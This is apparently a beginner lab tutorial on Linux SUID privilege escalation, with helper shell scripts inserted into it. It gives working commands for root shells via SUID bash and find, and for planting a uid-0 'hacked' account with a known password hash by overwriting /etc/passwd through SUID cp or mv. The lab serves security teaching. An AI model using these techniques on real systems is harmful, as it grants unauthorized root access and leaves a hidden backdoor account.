SUID Privilege Escalation on Linux

Beginner

Introduction

In this lab, you will learn about the SUID (Set user ID upon execution) permission and how to leverage it for privilege escalation on Linux systems. The goal is to gain root access by exploiting SUID binaries with various techniques, including using bash, find, cp, and mv commands.

Understanding SUID

In this step, you will understand the concept of SUID permission and its implications.

Typically, when a program is executed on Linux, it runs with the privileges of the user who started it. Some programs, however, must do things that user is not allowed to do directly; the classic example is passwd, which has to write the root-owned /etc/shadow so that users can change their own password. To allow regular users to run such programs with elevated privileges, the SUID permission can be set on the executable file.

SUID stands for "Set user ID upon execution." When a file with the SUID bit set is executed, the process's effective user ID (EUID) becomes the UID of the file's owner, while the real user ID (RUID) stays that of the user who ran it. If the owner is root, the program runs with root privileges no matter who starts it. In this lab environment, cp is owned by root and has been deliberately given the SUID bit, so any user can execute it with root privileges. On a normal installation cp is not SUID, and a root-owned SUID cp is exactly the kind of misconfiguration this lab teaches you to find.

To check the SUID permission on the cp command and save the output to a file, run the following command:

ls -l /usr/bin/cp > /home/labex/project/suid_cp.txt

View the contents of the suid_cp.txt file using the following command:

cat /home/labex/project/suid_cp.txt

Expected output:

-rwsr-xr-x 1 root root 141832 Feb  8  2024 /usr/bin/cp

You should see an s in place of the owner's execute bit (rws instead of rwx); that is the SUID permission. In octal notation it is the 4000 bit, which is why the find commands later in this lab test for -perm -4000.

While SUID can be useful for allowing regular users to run specific privileged commands, it can also be exploited if the SUID binary can be made to execute arbitrary commands, spawn a shell, or read and write arbitrary files.

Exploiting SUID with bash

In this step, you will learn how to exploit the bash command with SUID permission for privilege escalation.

  1. First, open a terminal and navigate to the /home/labex/project directory.

    cd /home/labex/project

    Check the permissions of the bash command.

    ls -l /bin/bash

    Expected output:

    -rwsr-xr-x 1 root root 1037520 Feb  5  2022 /bin/bash
  2. If the bash command has the SUID bit set, you can leverage it to get a root shell. Start it with the -p option; without -p, bash notices on startup that its effective UID (root) differs from its real UID (labex) and drops the privilege:

    bash -p

    whoami reports the effective user, so you can use it to verify that you have a root shell.

    whoami

    Expected output:

    root
  3. Now, as a check that you really are root, create a file named root.txt in the /root directory, which only root can write to, and verify that it exists.

    touch /root/root.txt

    The command succeeds silently; you should see the root.txt file in the /root directory.
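The checks you made by eye above, whether a binary really is usable SUID root and which identity a shell is running under, can be scripted. The following is an added example, not part of the original lab: suid_state reads the mode string from ls -ld and distinguishes a usable SUID bit (lowercase s) from a SUID bit on a file that is not executable (uppercase S, which confers nothing), is_suid_root combines that with the owner check, and uid_report prints the real and effective UIDs that bash -p preserves. The temporary file in the demo is constructed for the demonstration and is owned by you, not root.

```shell
#!/bin/sh
# Added example, not part of the original lab. Helpers for the checks the
# "Understanding SUID" and "Exploiting SUID with bash" steps do by hand.
# The temporary file used by demo is constructed and owned by the current user.

# Classify FILE from the first field of "ls -ld":
#   prints "suid"        -> owner exec bit and setuid bit ('s'): usable
#   prints "suid-noexec" -> setuid without exec bit ('S'): set but not runnable
#   prints "none"        -> no setuid bit
suid_state() {
    mode=$(ls -ld -- "$1" | cut -c1-10)
    case "$mode" in
        ???s*) echo suid ;;
        ???S*) echo suid-noexec ;;
        *)     echo none ;;
    esac
}

# Owner whose privileges a SUID FILE confers (field 3 of "ls -ld").
suid_owner() {
    ls -ld -- "$1" | awk '{ print $3 }'
}

# True only when FILE is usable SUID and owned by root: the case worth exploiting.
is_suid_root() {
    [ "$(suid_state "$1")" = suid ] && [ "$(suid_owner "$1")" = root ]
}

# Report real and effective UID. In a shell obtained with "bash -p" from a
# SUID root bash this prints ruid=<your uid> euid=0; whoami shows the
# effective UID, which is why it answers "root" there.
uid_report() {
    printf 'ruid=%s euid=%s\n' "$(id -r -u)" "$(id -u)"
}

# Demonstration on a constructed temporary file: the bit is set and cleared
# with chmod, and the owner is the current user, so is_suid_root stays false.
demo() {
    f=$(mktemp)
    chmod 0755 "$f"; printf '%s after chmod 0755: %s\n' "$f" "$(suid_state "$f")"
    chmod 4755 "$f"; printf '%s after chmod 4755: %s\n' "$f" "$(suid_state "$f")"
    chmod 4644 "$f"; printf '%s after chmod 4644: %s\n' "$f" "$(suid_state "$f")"
    if is_suid_root "$f"; then echo "suid root"; else echo "not suid root (owner: $(suid_owner "$f"))"; fi
    rm -f "$f"
    uid_report
}
demo
```

Run is_suid_root against /bin/bash or /usr/bin/cp inside the lab to confirm the state the ls -l output shows; outside the lab, both should report "not suid root".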

Exploiting SUID with find

In this step, you will learn how to exploit the find command with SUID permission for privilege escalation.

After the last step you have a root shell. Before starting this step, leave it with the exit command (or open a new terminal) so that you are the labex user again; otherwise the commands below would not demonstrate anything.

  1. First, navigate to the /home/labex/project directory:

    cd /home/labex/project

    Check the permissions of the find command:

    ls -l /usr/bin/find

    If the find command has the SUID bit set, you can leverage it to execute system commands with root privileges.

  2. The syntax for executing a command with find is:

    find <file> -exec <command> \;

    Here, <file> can be any existing file; find only needs a starting point to walk. Let's create a file called test:

    touch test
  3. Now, you can execute commands using find:

    find test -exec whoami \;

    This will execute the whoami command with root privileges. Each -exec runs a single command, though, so this method is clumsy for multi-step work and inconvenient for interactive commands like ssh or su.

  4. To get a more convenient root shell, you can execute the /bin/bash command:

    find test -exec /bin/bash -p \;

    Note: the -p flag is necessary because bash, when started with an effective user ID (EUID) that differs from the real user ID (RUID), resets the EUID to the RUID unless -p is given.

  5. You should now have a root shell. Create a file named root.txt in the /root directory and verify that it exists:

    touch /root/root.txt

    You should see the root.txt file in the /root directory.

Exploiting SUID with cp and mv

In this step, you will learn how to exploit the cp and mv commands with SUID permission for privilege escalation by overwriting the /etc/passwd file with a copy that contains an extra uid 0 account (the same idea works on /etc/shadow).

After the last step you have a root shell. Before starting this step, leave it with the exit command (or open a new terminal) so that you are the labex user again.

  1. First, navigate to the /home/labex/project directory:

    cd /home/labex/project

    Check the permissions of the cp command:

    ls -l /bin/cp

    If the cp command has the SUID bit set, you can proceed with the exploitation.

  2. Make a working copy of /etc/passwd in your project directory. Keep this copy: it is also your backup if the edited file turns out to be malformed, since a broken /etc/passwd locks every account out.

    cat /etc/passwd > /home/labex/project/passwd
  3. Create a new user entry with the following details:

  • Username: hacked

  • Password: pass123

    Append the following line to the end of the /home/labex/project/passwd file:

    echo 'hacked:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> /home/labex/project/passwd

    The second field is an MD5-crypt hash of pass123 (the $1$ prefix marks the format). Because it is a hash rather than x, the login code uses it directly and never consults /etc/shadow. The third and fourth fields set the uid and gid to 0, which is what makes the account root.

  4. Now, use the cp command with SUID permission to overwrite the /etc/passwd file. cp runs as root, so it can write to a file that labex could only read:

    cp /home/labex/project/passwd /etc/passwd
  5. After overwriting the file, you can switch to the hacked user with the password pass123 using the su command:

    su hacked

Since the hacked user has a user ID (uid) of 0, you will have root privileges.

The exploitation method for the mv command is the same: replace cp with mv in step 4 and try it yourself. One difference to be aware of: mv moves the file you created, so /etc/passwd ends up owned by labex rather than root and with your file's permissions. Logins still work, but the change is easy for a defender to spot.
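Before overwriting /etc/passwd it is worth checking that the staged file is well formed, because a malformed /etc/passwd can lock every account out of the machine, including the root shell you are trying to obtain. The following helpers are an added example, not part of the lab: make_hash shows how an MD5-crypt hash of the $1$salt$... form used above is produced with openssl (assumed to be installed), add_root_entry appends a uid 0 entry in the same layout as the hacked line, validate_passwd rejects malformed files, and install_passwd performs the backup-then-copy. In the lab the target would be /etc/passwd and cp the SUID binary; the sample file in the demo is constructed.

```shell
#!/bin/sh
# Added example, not part of the original lab: stage, check and install a
# replacement passwd file. A malformed /etc/passwd locks every account out,
# so the staged copy is validated before cp is used to overwrite the real
# one, and a backup is kept. openssl is assumed to be installed for make_hash.

# MD5-crypt hash ("$1$<salt>$...") for PASSWORD with SALT, the same format
# as the hacked entry used in the lab.
make_hash() {
    openssl passwd -1 -salt "$2" "$1"
}

# Append a uid 0 / gid 0 entry for USER with HASH to the staged FILE.
# Because the second field is a hash rather than "x", login uses it
# directly and never consults /etc/shadow.
add_root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$2" "$3" >> "$1"
}

# Reject a passwd FILE unless every line has 7 colon-separated fields,
# a non-empty unique username and a numeric uid and gid. Returns 1 on any problem.
validate_passwd() {
    awk -F: '
        NF != 7          { print "line " NR ": expected 7 fields, got " NF; bad = 1 }
        $1 == ""         { print "line " NR ": empty username"; bad = 1 }
        $1 in seen       { print "line " NR ": duplicate user " $1; bad = 1 }
        $3 !~ /^[0-9]+$/ { print "line " NR ": uid is not numeric"; bad = 1 }
        $4 !~ /^[0-9]+$/ { print "line " NR ": gid is not numeric"; bad = 1 }
                         { seen[$1] = 1 }
        END              { exit bad + 0 }
    ' "$1"
}

# Back TARGET up to TARGET.bak and copy STAGED over it, but only if STAGED
# validates. In the lab TARGET is /etc/passwd and cp is the SUID binary.
install_passwd() {
    staged=$1
    target=$2
    if ! validate_passwd "$staged"; then
        echo "refusing to install $staged: it is malformed" >&2
        return 1
    fi
    cp -- "$target" "$target.bak" && cp -- "$staged" "$target"
}

# Constructed sample content standing in for /etc/passwd.
SAMPLE='root:x:0:0:root:/root:/bin/bash
labex:x:1000:1000:labex:/home/labex:/bin/bash'

demo() {
    d=$(mktemp -d)
    printf '%s\n' "$SAMPLE" > "$d/target"      # stands in for /etc/passwd
    cp -- "$d/target" "$d/passwd"               # the working copy from step 2
    add_root_entry "$d/passwd" hacked '$1$ignite$3eTbJm98O9Hz.k1NTdNxe1'
    if command -v openssl >/dev/null 2>&1; then
        printf 'a fresh hash of the same form: %s\n' "$(make_hash pass123 ignite)"
    fi
    install_passwd "$d/passwd" "$d/target" && tail -n 1 "$d/target"
    rm -rf "$d"
}
demo
```

In the lab, call install_passwd /home/labex/project/passwd /etc/passwd after sourcing the helpers; because the shell runs cp, which is SUID root there, both the backup and the overwrite succeed even though labex cannot write to /etc.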

Finding SUID Binaries

In this step, you will learn how to find SUID binaries on a system that can potentially be exploited for privilege escalation.

  1. You can use any of the following commands to list all executable files with the SUID bit set. -perm -4000 and -perm -u=s are two spellings of the same test (the SUID bit is set, whatever the other bits are); the third form also prints the mode and owner of each match. The 2>/dev/null hides the permission-denied errors from directories you cannot read.

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
  2. Navigate to the /home/labex/project directory to perform the following steps.

    cd /home/labex/project
  3. Choose any of the commands to list the SUID binaries on the system and analyze the output.

    find / -user root -perm -4000 -print 2>/dev/null > check_results.txt

    Check the contents of the check_results.txt file to view the list of SUID binaries on the system.

    cat check_results.txt

    However, most of the output is legitimate: programs such as passwd, sudo and mount are SUID root on every installation and are designed with that in mind. Only binaries that can be made to run commands, spawn a shell, or read and write arbitrary files are useful for escalation, so the list needs manual analysis. Compare each entry against what a default install of the distribution ships and against a reference such as GTFOBins, and pay particular attention to anything in a non-standard location.
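A first pass over that list can be scripted. The following is an added example, not the lab's own code: triage_suid reads the paths produced by the find command from a file, flags the four binaries this lab exploits, and separately flags SUID files living outside the usual system directories, which are the ones most likely to be custom additions and worth a manual look. The sample list is constructed; the set of "standard" directories is an assumption for this example.

```shell
#!/bin/sh
# Added example, not part of the original lab: triage a list of SUID files
# (the output of "find / -perm -4000 ...") against the binaries this lab
# exploits and flag files outside the standard system directories.

# Binaries shown in this lab to give a root shell when SUID. A real triage
# would use a far longer list (GTFOBins catalogues them).
KNOWN='bash find cp mv'

# Read one path per line from FILE and print a tab-separated triage line:
#   KNOWN    <path>  basename is one of the lab's exploitable binaries
#   UNUSUAL  <path>  outside the standard directories (assumed set below)
#   OTHER    <path>  standard location, still needs manual review
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        dir=${path%/*}
        status=OTHER
        for k in $KNOWN; do
            if [ "$name" = "$k" ]; then status=KNOWN; fi
        done
        if [ "$status" = OTHER ]; then
            case "$dir" in
                /bin|/sbin|/usr/bin|/usr/sbin|/usr/lib*|/usr/libexec*) ;;
                *) status=UNUSUAL ;;
            esac
        fi
        printf '%s\t%s\n' "$status" "$path"
    done < "$1"
}

# Number of entries in FILE that triage to STATUS.
count_status() {
    triage_suid "$1" | awk -F'\t' -v s="$2" '$1 == s { n++ } END { print n + 0 }'
}

# Constructed sample output of the find command (not taken from a real system).
SAMPLE_LIST='/usr/bin/passwd
/usr/bin/find
/bin/cp
/usr/lib/openssh/ssh-keysign
/opt/backup/runme'

demo() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_LIST" > "$f"
    triage_suid "$f"
    printf 'known=%s unusual=%s other=%s\n' \
        "$(count_status "$f" KNOWN)" "$(count_status "$f" UNUSUAL)" "$(count_status "$f" OTHER)"
    rm -f "$f"
}
demo
```

In the lab, run triage_suid /home/labex/project/check_results.txt to triage the real list; the KNOWN lines are the binaries exploited in the earlier steps, and any UNUSUAL line is the first thing to inspect by hand.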

Summary

In this lab, you learned about the SUID permission and how to leverage various SUID binaries, such as bash, find, cp, and mv, for privilege escalation on Linux systems. You gained hands-on experience in exploiting these binaries to obtain root access, which is a crucial skill in the field of cybersecurity. The lab provided a practical scenario and guided you through the steps to understand and apply the techniques effectively.
